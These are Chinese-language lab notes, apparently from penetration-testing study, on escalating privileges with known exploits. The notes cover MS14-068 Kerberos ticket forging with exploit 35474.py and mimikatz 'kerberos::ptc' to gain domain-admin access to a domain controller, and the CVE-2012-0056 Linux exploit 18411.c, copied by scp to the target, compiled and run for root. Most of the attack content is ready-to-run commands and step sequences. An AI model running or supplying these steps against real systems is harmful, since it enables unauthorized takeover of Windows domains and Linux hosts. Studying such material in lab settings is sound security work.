提权-利用漏洞提权
Ms11-080
Kb2592799
先把python编译成exe,再在目标机器执行
- https://pypi.org/project/pywin32/ (pyinstaller会调用pywin32)
- pyinstaller.org
1 |
|
- 如果目标机器有python环境,直接执行就可以。
Ms14-068
从本机管理员权限获取域管理员权限
searchsploit ms14-068
得到35474.pycp /usr/share/exploitdb/exploits/windows/remote/35474.py ~/ms14-068.py
- 在windows通过kali /usr/share/windows-resources/binaries/whoami.exe得到域用户的sid,还需要域控制器的ip。
- 使用漏洞利用代码生成TGT票据(kerbros协议的票据)
python ms14-068.py -u u1@lab.com -s S-1-5-21-1226907004-2355705551-2341087478-1109 -d 192.168.0.119
- 输入u1域用户的密码
- 拷贝票据到windows系统
- 通过minikatz完成提权
kerberos::ptc TGT_u1@lab.com.ccache
- 发现可以访问域控制器的C盘
- 如果kali缺少python库文件,下载地址:https://github.com/bidord/pykek
CVE-2012-0056
CVE-2012-0056
- /proc/pid/mem
- kernels>=2.6.39
- http://blog.zx2c4.com/749
Ubuntu11.10
gcc
sudo apt-cdrom add
把光盘作为apt的更新源sudo apt-get install gcc
gcc 18411.c -o exp
首先searchesploit 18411.c 找到文件位置
/usr/share/exploitdb/exploits/linux/local
scp /usr/share/exploitdb/exploits/linux/local/18411.c flower@192.168.0.110:/home/flower
gcc编译好后,直接执行./exp,发现命令提示符$变为#,提权成功。
其它:
Ms08-067
Ms09-001
Ms10-017
Ms12-020
Kali修改默认python为python3
rm /usr/bin/python
ln -s /usr/bin/python3 /usr/bin/python